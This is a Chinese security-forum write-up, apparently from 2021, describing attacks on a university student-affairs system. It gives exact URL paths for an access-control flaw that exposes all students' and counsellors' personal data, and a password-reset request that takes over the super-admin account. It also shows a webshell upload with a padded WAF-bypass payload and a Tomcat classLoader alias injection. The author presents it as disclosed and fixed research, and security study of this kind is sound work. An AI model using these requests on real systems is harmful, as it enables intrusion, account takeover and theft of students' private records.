问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
挖掘0day打进不同学校
渗透测试
#写在前面 下文的所有漏洞都是需要有学校统一门户的账号和密码的情况下才能挖掘出来的,不过我也有挖到个别特殊的学校个例,可以直接未授权访问那些目录页面造成危害。挖掘的案例均已提交至漏...
写在前面 ==== 下文的所有漏洞都是需要有学校统一门户的账号和密码的情况下才能挖掘出来的,不过我也有挖到个别特殊的学校个例,可以直接未授权访问那些目录页面造成危害。挖掘的案例均已提交至漏洞平台并已经修复。 过程 == 首先登陆统一门户,登录账号密码,找到学工系统页面: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-01108ee0cf9a8c2ca738bd5072de25e229b15d9e.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-01108ee0cf9a8c2ca738bd5072de25e229b15d9e.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-d8d85fd6cc814b38e29037aaf6d4573723139721.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-d8d85fd6cc814b38e29037aaf6d4573723139721.png) 1.越权漏洞: 访问以下的路径: `http://x.x.x.x/xgxt/xsxx_xsgl.do?method=showStudentsAjax&isAll=true` 然后便可查看所有学生列表: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-ddd85259210848cf8577a7cbd77828ab7be50ea4.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-ddd85259210848cf8577a7cbd77828ab7be50ea4.png) `http://x.x.x.x/xgxt/general_szdw.do?method=szdwRybb&lx=fdy` 然后便可查看所有辅导员列表: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-438325d343f8e1a1d45396c9e0399daf306f1b07.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-438325d343f8e1a1d45396c9e0399daf306f1b07.png) `http://x.x.x.x/xgxt/xsxx_xsgl.do?method=getXsjbxxMore&xh=某学号` 然后便可以查看该学号的学生的敏感信息: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-7a774c2b46a3b789636d1d13deee5dbf01698077.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-7a774c2b46a3b789636d1d13deee5dbf01698077.png) 最后根据该漏洞可以编写个脚本,来批量获取系统内用户的敏感信息,效果如下: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-39eec6f47c1f8e966c0bb09857bee997a0c1c5d0.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-39eec6f47c1f8e966c0bb09857bee997a0c1c5d0.png) 2.任意密码重置漏洞: 访问该路径: `http://x.x.x.x/xgxt/mmzhgl_mmzh.do?method=xgmm&yhm=想要修改的账号` [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-d5d4acd472b536bdb469d752b5e4bd345f1d41d3.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-d5d4acd472b536bdb469d752b5e4bd345f1d41d3.png) 然后可以将系统内置的超级管理员账号的密码重置,我重置为test0123: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-65458b1d0b5aeb794653a15fb17e74fb33009a01.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-65458b1d0b5aeb794653a15fb17e74fb33009a01.png) 然后再退出到`http://x,x,x,x/xgxt/`的学工系统登录页面,重新登录: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-cdf6bebead89900da40349a9895bc8f026eaaa2b.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-cdf6bebead89900da40349a9895bc8f026eaaa2b.png) 登录成功: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-0e56eb3a63bbe7809dae6c8c7d5fe999f6ae8b9e.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-0e56eb3a63bbe7809dae6c8c7d5fe999f6ae8b9e.png) 既然是超级管理员,那么便可查看到许多敏感信息了,这里就不截图和赘述了。 3.文件上传漏洞(需要绕过waf的拦截): 访问该路径: `http://x.x.x.x/xgxt/commXszz.do?method=uploadFile` 这里我上传的是jspx木马,查看网站页面源代码来获取文件路径: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-7a4e475fe85181362bc0cd81e885eead0a3c247a.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-7a4e475fe85181362bc0cd81e885eead0a3c247a.png) 访问`http://x.x.x.x/xgxt/mmzhgl_mmzh.do?method=checkYh&type=view`,然后用Burp Suite用POST方式填充垃圾字符数据可绕过waf。方法就是利用脚本生成一个垃圾字符数据,或者自己aaaa什么的堆叠一下,因为有些waf要是字节超出了范围,那么就不会检测到堆叠之后的马,同时也可以利用注释符(可用`<!– … –>`来注释)再注释掉脏数据,那么就只剩下马了,waf就绕过了: ```php method=checkYh&type=view&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&&class.classLoader.resources.dirContext.aliases=/abcd=/upload/xxxx/ ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-1742abb7b95ec90601e5a63da62606e435492543.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-1742abb7b95ec90601e5a63da62606e435492543.png) 然后拼合url,获取木马地址:`http://x.x.x.x/xgxt/abcd/xxx.jspx` [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-75eca8717e92796537aa0b89f90e0e86529dc877.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-75eca8717e92796537aa0b89f90e0e86529dc877.png) 至此,完成本次渗透过程。
发表于 2021-08-13 10:02:21
阅读 ( 7449 )
分类:
渗透测试
8 推荐
收藏
7 条评论
徐凤年
2021-08-14 15:37
太刁了师傅
请先
登录
后评论
N1eC
2021-08-16 08:55
http://x.x.x.x/xgxt/xsxx_xsgl.do?method=showStudentsAjax&isAll=true师傅这路径是怎么找到的
请先
登录
后评论
jokes777
2022-01-08 19:59
牛啊
请先
登录
后评论
jokes777
2022-01-08 20:04
牛啊
请先
登录
后评论
D14
2022-01-25 23:41
虽然知道不可能,但还是想问一下,请问方便透露cms么?想整理进本地笔记,以后万一做等保遇到了直接翻出来。谢谢
请先
登录
后评论
jokes777
2022-04-17 15:05
我也想问
请先
登录
后评论
r0oM
2022-08-22 18:40
这是0day?
请先
登录
后评论
请先
登录
后评论
Johnson666
19 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!